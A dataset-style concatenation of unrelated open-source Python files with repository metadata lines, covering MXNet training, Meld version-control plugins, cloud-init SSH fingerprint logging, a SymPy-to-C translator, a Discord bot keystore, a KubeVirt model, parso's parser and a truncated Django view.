mean[0,:,:] = 0.4914
mean[1,:,:] = 0.4822
mean[2,:,:] = 0.4465
std = np.zeros(dataShape)
std[0,:,:] = 0.2023
std[1,:,:] = 0.1994
std[2,:,:] = 0.2010
def test_transform(X,Y):
out = X.astype(np.float32)/255.0
out = np.transpose(out,(2,0,1))
#pdb.set_trace()
#return (mx.image.color_normalize(out,np.asarray([0.4914, 0.4822, 0.4465]), np.asarray([0.2023, 0.1994, 0.2010])),Y)
return (mx.image.color_normalize(out.asnumpy(),mean,std),Y)
def train_transform(X,Y):
return test_transform(X,Y)
def get_net():
mod = import_module('symbol.resnet18')
net = mod.get_symbol(classNum,utils.try_gpu())
return net
def get_train_test(): #mxnet 1.0.0
train_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'train') , flag=1, transform = train_transform)
test_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'test'), flag=1, transform = test_transform)
for label,labelname in enumerate( train_ds.synsets ):
logging.info('%d %s'%(label, labelname))
loader = mx.gluon.data.DataLoader
train_data = loader( train_ds, \
trainBatchSize,shuffle=True, last_batch='keep')
test_data =loader( test_ds, \
testBatchSize, shuffle=True, last_batch='keep')
return (train_data, test_data)
def get_trainer(net):
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(),"sgd",{'learning_rate':lr_base, 'momentum':0.9, 'wd':weight_decay})
return (trainer,loss)
def main():
net = get_net()
net_str = '%s'%net
#logging.info('ok')
logging.info(net_str)
if pretrained is not None:
net.load_params(pretrained,ctx=utils.try_gpu())
train_data, test_data = get_train_test()
trainer,loss = get_trainer(net)
utils.train(train_data, test_data, trainBatchSize,\
net, loss, trainer, utils.try_gpu(), 1000,\
500,0.1,print_batches=100, chk_pts_dir=checkpoints)
if __name__=="__main__":
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',filename="train.log", level=logging.INFO)
main()
|
gpl-2.0
| -2,859,128,899,069,319,700
| 30.096386
| 130
| 0.649361
| false
| 2.956472
| true
| false
| false
|
kaiw/meld
|
meld/vc/__init__.py
|
1
|
3230
|
### Copyright (C) 2002-2005 Stephen Kennedy <stevek@gnome.org>
### Redistribution and use in source and binary forms, with or without
### modification, are permitted provided that the following conditions
### are met:
###
### 1. Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
### 2. Redistributions in binary form must reproduce the above copyright
### notice, this list of conditions and the following disclaimer in the
### documentation and/or other materials provided with the distribution.
### THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
### IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
### OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
### IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
### INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
### NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
### DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
### THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
### (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
### THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import glob
from . import _null
from ._vc import DATA_NAME, DATA_STATE, DATA_REVISION, DATA_OPTIONS
def load_plugins():
_vcdir = os.path.dirname(os.path.abspath(__file__))
ret = []
for plugin in glob.glob(os.path.join(_vcdir, "[a-z]*.py")):
modname = "meld.vc.%s" % os.path.basename(os.path.splitext(plugin)[0])
ret.append( __import__(modname, globals(), locals(), "*") )
return ret
_plugins = load_plugins()
def get_plugins_metadata():
ret = []
for p in _plugins:
# Some plugins have VC_DIR=None until instantiated
if p.Vc.VC_DIR:
ret.append(p.Vc.VC_DIR)
# Most plugins have VC_METADATA=None
if p.Vc.VC_METADATA:
ret.extend(p.Vc.VC_METADATA)
return ret
vc_sort_order = (
"Git",
"Bazaar",
"Mercurial",
"Fossil",
"Monotone",
"Darcs",
"SVK",
"Subversion",
"Subversion 1.7",
"CVS",
)
def get_vcs(location):
"""Pick only the Vcs with the longest repo root
Some VC plugins search their repository root
by walking the filesystem upwards its root
and now that we display multiple VCs in the
same directory, we must filter those other
repositories that are located in the search
path towards "/" as they are not relevant
to the user.
"""
vcs = []
max_len = 0
for plugin in _plugins:
try:
avc = plugin.Vc(location)
l = len(avc.root)
if l == max_len:
vcs.append(avc)
elif l > max_len:
max_len = l
vcs = [avc]
except ValueError:
pass
if not vcs:
# No plugin recognized that location, fallback to _null
return [_null.Vc(location)]
vc_sort_key = lambda v: vc_sort_order.index(v.NAME)
vcs.sort(key=vc_sort_key)
return vcs
|
gpl-2.0
| 4,926,562,048,158,405,000
| 32.645833
| 78
| 0.64644
| false
| 3.919903
| false
| false
| false
|
cbuben/cloud-init
|
cloudinit/config/cc_ssh_authkey_fingerprints.py
|
1
|
3690
|
# vi: ts=4 expandtab
#
# Copyright (C) 2012 Yahoo! Inc.
#
# Author: Joshua Harlow <harlowja@yahoo-inc.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import hashlib
from prettytable import PrettyTable
# Ensure this is aliased to a name not 'distros'
# since the module attribute 'distros'
# is a list of distros that are supported, not a sub-module
from cloudinit import distros as ds
from cloudinit import ssh_util
from cloudinit import util
def _split_hash(bin_hash):
split_up = []
for i in xrange(0, len(bin_hash), 2):
split_up.append(bin_hash[i:i + 2])
return split_up
def _gen_fingerprint(b64_text, hash_meth='md5'):
if not b64_text:
return ''
# TBD(harlowja): Maybe we should feed this into 'ssh -lf'?
try:
hasher = hashlib.new(hash_meth)
hasher.update(base64.b64decode(b64_text))
return ":".join(_split_hash(hasher.hexdigest()))
except (TypeError, ValueError):
# Raised when b64 not really b64...
# or when the hash type is not really
# a known/supported hash type...
return '?'
def _is_printable_key(entry):
if any([entry.keytype, entry.base64, entry.comment, entry.options]):
if (entry.keytype and
entry.keytype.lower().strip() in ['ssh-dss', 'ssh-rsa']):
return True
return False
def _pprint_key_entries(user, key_fn, key_entries, hash_meth='md5',
prefix='ci-info: '):
if not key_entries:
message = ("%sno authorized ssh keys fingerprints found for user %s.\n"
% (prefix, user))
util.multi_log(message)
return
tbl_fields = ['Keytype', 'Fingerprint (%s)' % (hash_meth), 'Options',
'Comment']
tbl = PrettyTable(tbl_fields)
for entry in key_entries:
if _is_printable_key(entry):
row = []
row.append(entry.keytype or '-')
row.append(_gen_fingerprint(entry.base64, hash_meth) or '-')
row.append(entry.options or '-')
row.append(entry.comment or '-')
tbl.add_row(row)
authtbl_s = tbl.get_string()
authtbl_lines = authtbl_s.splitlines()
max_len = len(max(authtbl_lines, key=len))
lines = [
util.center("Authorized keys from %s for user %s" %
(key_fn, user), "+", max_len),
]
lines.extend(authtbl_lines)
for line in lines:
util.multi_log(text="%s%s\n" % (prefix, line),
stderr=False, console=True)
def handle(name, cfg, cloud, log, _args):
if util.is_true(cfg.get('no_ssh_fingerprints', False)):
log.debug(("Skipping module named %s, "
"logging of ssh fingerprints disabled"), name)
return
hash_meth = util.get_cfg_option_str(cfg, "authkey_hash", "md5")
(users, _groups) = ds.normalize_users_groups(cfg, cloud.distro)
for (user_name, _cfg) in users.items():
(key_fn, key_entries) = ssh_util.extract_authorized_keys(user_name)
_pprint_key_entries(user_name, key_fn,
key_entries, hash_meth)
|
gpl-3.0
| 5,022,524,162,396,625,000
| 34.142857
| 79
| 0.615989
| false
| 3.565217
| false
| false
| false
|
vincent-noel/libSigNetSim
|
libsignetsim/cwriter/CMathWriter.py
|
1
|
12709
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
from __future__ import print_function
from sympy import simplify, srepr
from libsignetsim.model.math.sympy_shortcuts import *
from libsignetsim.settings.Settings import Settings
from libsignetsim.model.math.MathException import MathException, DelayNotImplemented
class CMathWriter(object):
""" Class for handling math formulaes """
MATH_ERR = -1
MATH_SBML = 0
MATH_INTERNAL = 1
MATH_DEVINTERNAL = 2
MATH_C = 3
MATH_PRETTYPRINT = 4
MATH_FORMULA = 20
MATH_EQUATION = 21
MATH_VARIABLE = 22
MATH_KINETICLAW = 23
MATH_FUNCTION = 24
MATH_RATERULE = 25
MATH_EVENTASSIGNMENT= 26
MATH_ASSIGNMENTRULE = 27
MATH_ALGEBRAICRULE = 28
ZERO = SympyInteger(0)
def __init__(self, model):
""" Constructor """
self.model = model
def writeCCode(self, tree):
math = self.translateForC(tree)
if Settings.verbose >= 2:
print("\n> writeCCode")
print(">> input : %s" % srepr(tree))
print(">> input simplified : %s" % str(tree))
print(">> output : %s" % math)
return math
def translateVariableForC(self, variable, derivative=False):
""" Translates a Sympy symbol in C """
if str(variable) == "_time_":
return "t"
elif str(variable) == "_avogadro_":
return "RT_NA"
t_var = None
if self.model.listOfVariables.containsSymbol(variable):
t_var = self.model.listOfVariables.getBySymbol(variable)
else:
print("> Err : %s" % str(variable))
t_pos = None
if t_var.isDerivative():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = t_var.ind+1
elif t_var.isAssignment():
c_var = "ass"
t_pos = t_var.ind+1
elif t_var.isConstant():
c_var = "cst"
t_pos = t_var.ind+1
elif t_var.isAlgebraic():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = self.model.nbOdes + t_var.ind+1
else:
raise MathException("Cannot determine the mathematical type of variable %s" % str(variable))
return "Ith(%s,%s)" % (c_var, t_pos)
def translateForC(self, tree):
""" Translate a sympy tree into a C string """
if isinstance(tree, int):
return "RCONST(%d.0)" % tree
elif isinstance(tree, float):
t_string = "%.16g" % tree
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympySymbol:
return self.translateVariableForC(tree)
elif tree.func == SympyDerivative:
return self.translateVariableForC(tree.args[0], derivative=True)
elif tree.func == SympyInteger:
return "RCONST(%d.0)" % int(tree)
elif tree.func == SympyFloat:
t_string = "%.16g" % float(tree)
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympyRational:
return "(%s/%s)" % (self.translateForC(tree.p), self.translateForC(tree.q))
elif tree.func == SympyNegOne:
return "RCONST(-1.0)"
elif tree.func == SympyOne:
return "RCONST(1.0)"
elif tree.func == SympyHalf:
return "RCONST(0.5)"
elif tree.func == SympyZero:
return "RCONST(0.0)"
elif tree == SympyPi:
return "RT_PI"
elif tree.func == SympyE or tree.func == SympyExp1:
return "RT_E"
elif tree == SympyInf:
return "RT_INF"
elif tree == -SympyInf:
return "-RT_INF"
elif tree == SympyNan:
return "RT_NAN"
elif tree == SympyTrue or tree == True:
return "1"
elif tree == SympyFalse or tree == False:
return "0"
elif tree.func == SympyMax:
return "max(%s, %s)" % (
self.translateForC(tree.args[0]),
self.translateForC(tree.args[1])
)
elif tree.func == SympyAdd:
t_add = "("
for i_arg, arg in enumerate(tree.args):
if i_arg > 0:
t_add = t_add + " + "
t_add = t_add + self.translateForC(arg)
return t_add + ")"
elif tree.func == SympyMul:
if len(tree.args) == 2:
if tree.args[0].func == SympyNegOne:
return "-" + self.translateForC(tree.args[1])
if tree.args[1].func == SympyNegOne:
return "-" + self.translateForC(tree.args[0])
started = False
t_minus = ""
t_mul = ""
t_divider = ""
for i_arg, arg in enumerate(tree.args):
if arg.func == SympyNegOne:
t_mul = "-" + t_mul
elif arg.func == SympyPow and arg.args[1].func == SympyNegOne:
if t_divider == "":
t_divider = "%s" % self.translateForC(arg.args[0])
else:
t_divider += "*%s" % self.translateForC(arg.args[0])
else:
if started:
t_mul += "*"
started = True
t_mul += self.translateForC(arg)
if t_divider == "":
return t_mul
else:
return t_minus + "(" + t_mul + "/(%s))" % t_divider
# AST_FUNCTION_ABS
elif tree.func == SympyAbs:
return "rt_abs(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_QUOTIENT
elif tree.func == SympyQuotient:
return "((int) rt_floor(%s/%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_REM
elif tree.func == SympyRem:
return "((int) fmod(%s, %s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ARCCOS
elif tree.func == SympyAcos:
return "rt_acos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOSH
elif tree.func == SympyAcosh:
return "rt_acosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOT
elif tree.func == SympyAcot:
return "rt_acot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCSC
elif tree.func == SympyAcsc:
return "rt_acsc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOTH
elif tree.func == SympyAcoth:
return "rt_acoth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsec:
return "rt_asec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsin:
return "rt_asin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSINH
elif tree.func == SympyAsinh:
return "rt_asinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTAN
elif tree.func == SympyAtan:
return "rt_atan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTANH
elif tree.func == SympyAtanh:
return "rt_atanh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CEILING
elif tree.func == SympyCeiling:
return "rt_ceil(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COS
elif tree.func == SympyCos:
return "rt_cos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COSH
elif tree.func == SympyCosh:
return "rt_cosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COT
elif tree.func == SympyCot:
return "rt_cot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COTH
elif tree.func == SympyCoth:
return "rt_coth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CSC
elif tree.func == SympyCsc:
return "rt_csc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_DELAY
#TODO
#SEE BELOW !
# AST_FUNCTION_EXP
elif tree.func == SympyExp:
return "rt_exp(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FACTORIAL
elif tree.func == SympyFactorial:
return "rt_factorial(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FLOOR
elif tree.func == SympyFloor:
return "rt_floor(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_LOG
elif tree.func == SympyLog:
if len(tree.args) == 2:
return "(rt_log(%s)/rt_log(%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
else:
return "rt_log(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyPiecewise:
(t_val, t_cond) = tree.args[0]
line = "(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = ")"
for piece in range(1, len(tree.args)):
(t_val, t_cond) = tree.args[piece]
line = line + ":(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = line_end + ")"
line = line + ":(RCONST(0.0))" + line_end
return line
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyITE:
t_cond = tree.args[0]
t_val = tree.args[1]
t_other_val = tree.args[2]
line = "(%s?%s:%s)" % (self.translateForC(t_cond), self.translateForC(t_val), self.translateForC(t_other_val))
return line
# AST_FUNCTION_POWER
elif tree.func == SympyPow:
if len(tree.args) == 2 and tree.args[1].func == SympyNegOne:
return "RCONST(1.0)/(%s)" % self.translateForC(tree.args[0])
return "rt_pow(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ROOT
elif tree.func == SympyRoot:
return "rt_pow(%s,(RCONST(1.0)/%s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_SEC
elif tree.func == SympySec:
return "rt_sec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SIN
elif tree.func == SympySin:
return "rt_sin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SINH
elif tree.func == SympySinh:
return "rt_sinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TAN
elif tree.func == SympyTan:
return "rt_tan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TANH
elif tree.func == SympyTanh:
return "rt_tanh(%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyEqual:
return "rt_eq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyUnequal:
return "rt_neq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyGreaterThan:
return "rt_geq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyLessThan:
return "rt_leq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictGreaterThan:
return "rt_gt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictLessThan:
return "rt_lt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyAnd:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " && "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyOr:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " || "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyXor:
return self.translateForC(simplify(tree))
elif tree.func == SympyNot:
return "(!%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyImplies:
# p -> q == !p || q
# print srepr(tree)
# print tree.evalf()
return "(!" + self.translateForC(tree.args[0]) + " || " + self.translateForC(tree.args[1]) + ")"
elif tree.func == SympyUnevaluatedMin:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "min(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "min(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyUnevaluatedMax:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "max(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "max(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyFunction:
raise DelayNotImplemented()
else:
raise MathException("C Math Writer : Unknown Sympy Symbol %s" % str(tree))
return str(tree)
|
gpl-3.0
| -8,722,728,192,466,864,000
| 25.868922
| 113
| 0.634354
| false
| 2.681224
| false
| false
| false
|
Watchful1/RedditSubsBot
|
src/database/_keystore.py
|
1
|
1342
|
import discord_logging
import utils
from classes.key_value import KeyValue
log = discord_logging.get_logger()
class _DatabaseKeystore:
def __init__(self):
self.session = self.session # for pycharm linting
self.log_debug = self.log_debug
def save_keystore(self, key, value):
if self.log_debug:
log.debug(f"Saving keystore: {key} : {value}")
self.session.merge(KeyValue(key, value))
def get_keystore(self, key):
if self.log_debug:
log.debug(f"Fetching keystore: {key}")
key_value = self.session.query(KeyValue).filter_by(key=key).first()
if key_value is None:
if self.log_debug:
log.debug("Key not found")
return None
if self.log_debug:
log.debug(f"Value: {key_value.value}")
return key_value.value
def save_datetime(self, key, date_time):
self.save_keystore(key, utils.get_datetime_string(date_time))
def get_datetime(self, key, is_date=False):
result = self.get_keystore(key)
if result is None:
return None
else:
result_date = utils.parse_datetime_string(result)
if is_date:
return result_date.date()
else:
return result_date
def get_or_init_datetime(self, key):
result = self.get_datetime(key)
if result is None:
log.warning(f"Initializing key {key} to now")
now = utils.datetime_now()
self.save_datetime(key, now)
return now
return result
|
mit
| -628,551,014,755,818,100
| 23.851852
| 69
| 0.695976
| false
| 2.879828
| false
| false
| false
|
kubevirt/client-python
|
kubevirt/models/v1beta1_data_volume_blank_image.py
|
1
|
2409
|
# coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1DataVolumeBlankImage(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self):
"""
V1beta1DataVolumeBlankImage - a model defined in Swagger
"""
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1DataVolumeBlankImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
apache-2.0
| -3,823,461,405,543,961,600
| 23.333333
| 77
| 0.514321
| false
| 4.404022
| false
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/parso/python/parser.py
|
1
|
8593
|
from parso.python import tree
from parso.python.token import PythonTokenTypes
from parso.parser import BaseParser
NAME = PythonTokenTypes.NAME
INDENT = PythonTokenTypes.INDENT
DEDENT = PythonTokenTypes.DEDENT
class Parser(BaseParser):
"""
This class is used to parse a Python file, it then divides them into a
class structure of different scopes.
:param pgen_grammar: The grammar object of pgen2. Loaded by load_grammar.
"""
node_map = {
'expr_stmt': tree.ExprStmt,
'classdef': tree.Class,
'funcdef': tree.Function,
'file_input': tree.Module,
'import_name': tree.ImportName,
'import_from': tree.ImportFrom,
'break_stmt': tree.KeywordStatement,
'continue_stmt': tree.KeywordStatement,
'return_stmt': tree.ReturnStmt,
'raise_stmt': tree.KeywordStatement,
'yield_expr': tree.YieldExpr,
'del_stmt': tree.KeywordStatement,
'pass_stmt': tree.KeywordStatement,
'global_stmt': tree.GlobalStmt,
'nonlocal_stmt': tree.KeywordStatement,
'print_stmt': tree.KeywordStatement,
'assert_stmt': tree.AssertStmt,
'if_stmt': tree.IfStmt,
'with_stmt': tree.WithStmt,
'for_stmt': tree.ForStmt,
'while_stmt': tree.WhileStmt,
'try_stmt': tree.TryStmt,
'comp_for': tree.CompFor,
# Not sure if this is the best idea, but IMO it's the easiest way to
# avoid extreme amounts of work around the subtle difference of 2/3
# grammar in list comoprehensions.
'list_for': tree.CompFor,
# Same here. This just exists in Python 2.6.
'gen_for': tree.CompFor,
'decorator': tree.Decorator,
'lambdef': tree.Lambda,
'old_lambdef': tree.Lambda,
'lambdef_nocond': tree.Lambda,
}
default_node = tree.PythonNode
# Names/Keywords are handled separately
_leaf_map = {
PythonTokenTypes.STRING: tree.String,
PythonTokenTypes.NUMBER: tree.Number,
PythonTokenTypes.NEWLINE: tree.Newline,
PythonTokenTypes.ENDMARKER: tree.EndMarker,
PythonTokenTypes.FSTRING_STRING: tree.FStringString,
PythonTokenTypes.FSTRING_START: tree.FStringStart,
PythonTokenTypes.FSTRING_END: tree.FStringEnd,
}
def __init__(self, pgen_grammar, error_recovery=True, start_nonterminal='file_input'):
super(Parser, self).__init__(pgen_grammar, start_nonterminal,
error_recovery=error_recovery)
self.syntax_errors = []
self._omit_dedent_list = []
self._indent_counter = 0
def parse(self, tokens):
if self._error_recovery:
if self._start_nonterminal != 'file_input':
raise NotImplementedError
tokens = self._recovery_tokenize(tokens)
return super(Parser, self).parse(tokens)
def convert_node(self, nonterminal, children):
"""
Convert raw node information to a PythonBaseNode instance.
This is passed to the parser driver which calls it whenever a reduction of a
grammar rule produces a new complete node, so that the tree is build
strictly bottom-up.
"""
try:
node = self.node_map[nonterminal](children)
except KeyError:
if nonterminal == 'suite':
# We don't want the INDENT/DEDENT in our parser tree. Those
# leaves are just cancer. They are virtual leaves and not real
# ones and therefore have pseudo start/end positions and no
# prefixes. Just ignore them.
children = [children[0]] + children[2:-1]
elif nonterminal == 'list_if':
# Make transitioning from 2 to 3 easier.
nonterminal = 'comp_if'
elif nonterminal == 'listmaker':
# Same as list_if above.
nonterminal = 'testlist_comp'
node = self.default_node(nonterminal, children)
for c in children:
c.parent = node
return node
def convert_leaf(self, type, value, prefix, start_pos):
# print('leaf', repr(value), token.tok_name[type])
if type == NAME:
if value in self._pgen_grammar.reserved_syntax_strings:
return tree.Keyword(value, start_pos, prefix)
else:
return tree.Name(value, start_pos, prefix)
return self._leaf_map.get(type, tree.Operator)(value, start_pos, prefix)
def error_recovery(self, token):
tos_nodes = self.stack[-1].nodes
if tos_nodes:
last_leaf = tos_nodes[-1].get_last_leaf()
else:
last_leaf = None
if self._start_nonterminal == 'file_input' and \
(token.type == PythonTokenTypes.ENDMARKER
or token.type == DEDENT and '\n' not in last_leaf.value
and '\r' not in last_leaf.value):
# In Python statements need to end with a newline. But since it's
# possible (and valid in Python ) that there's no newline at the
# end of a file, we have to recover even if the user doesn't want
# error recovery.
if self.stack[-1].dfa.from_rule == 'simple_stmt':
try:
plan = self.stack[-1].dfa.transitions[PythonTokenTypes.NEWLINE]
except KeyError:
pass
else:
if plan.next_dfa.is_final and not plan.dfa_pushes:
# We are ignoring here that the newline would be
# required for a simple_stmt.
self.stack[-1].dfa = plan.next_dfa
self._add_token(token)
return
if not self._error_recovery:
return super(Parser, self).error_recovery(token)
def current_suite(stack):
# For now just discard everything that is not a suite or
# file_input, if we detect an error.
for until_index, stack_node in reversed(list(enumerate(stack))):
# `suite` can sometimes be only simple_stmt, not stmt.
if stack_node.nonterminal == 'file_input':
break
elif stack_node.nonterminal == 'suite':
# In the case where we just have a newline we don't want to
# do error recovery here. In all other cases, we want to do
# error recovery.
if len(stack_node.nodes) != 1:
break
return until_index
until_index = current_suite(self.stack)
if self._stack_removal(until_index + 1):
self._add_token(token)
else:
typ, value, start_pos, prefix = token
if typ == INDENT:
# For every deleted INDENT we have to delete a DEDENT as well.
# Otherwise the parser will get into trouble and DEDENT too early.
self._omit_dedent_list.append(self._indent_counter)
error_leaf = tree.PythonErrorLeaf(typ.name, value, start_pos, prefix)
self.stack[-1].nodes.append(error_leaf)
tos = self.stack[-1]
if tos.nonterminal == 'suite':
# Need at least one statement in the suite. This happend with the
# error recovery above.
try:
tos.dfa = tos.dfa.arcs['stmt']
except KeyError:
# We're already in a final state.
pass
def _stack_removal(self, start_index):
all_nodes = [node for stack_node in self.stack[start_index:] for node in stack_node.nodes]
if all_nodes:
node = tree.PythonErrorNode(all_nodes)
for n in all_nodes:
n.parent = node
self.stack[start_index - 1].nodes.append(node)
self.stack[start_index:] = []
return bool(all_nodes)
def _recovery_tokenize(self, tokens):
for token in tokens:
typ = token[0]
if typ == DEDENT:
# We need to count indents, because if we just omit any DEDENT,
# we might omit them in the wrong place.
o = self._omit_dedent_list
if o and o[-1] == self._indent_counter:
o.pop()
continue
self._indent_counter -= 1
elif typ == INDENT:
self._indent_counter += 1
yield token
|
mit
| 5,602,873,020,152,564,000
| 38.417431
| 98
| 0.56837
| false
| 4.210191
| false
| false
| false
|
migonzalvar/mfs2011-practicum-saas
|
webclient/agenda/views.py
|
1
|
5663
|
import datetime
import time
from django.http import Http404, HttpResponse
from django.shortcuts import render_to_response, redirect
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView
from django.utils.timezone import utc, get_current_timezone
import socket
import requests
import pytz
from forms import ShiftForm, AppointmentForm, QuickAppointmentForm
from server_models import (Shift, Appointment, Slot, datetime_to_dtstring,
DEFAULT_SLOT_LENGTH, TIMEFORMAT, FIELD_SEPARATOR)
# API helpers
def str_to_datetime(str_date, str_time):
"""Converts a local date and a time strings into datetime UTC."""
tz = get_current_timezone()
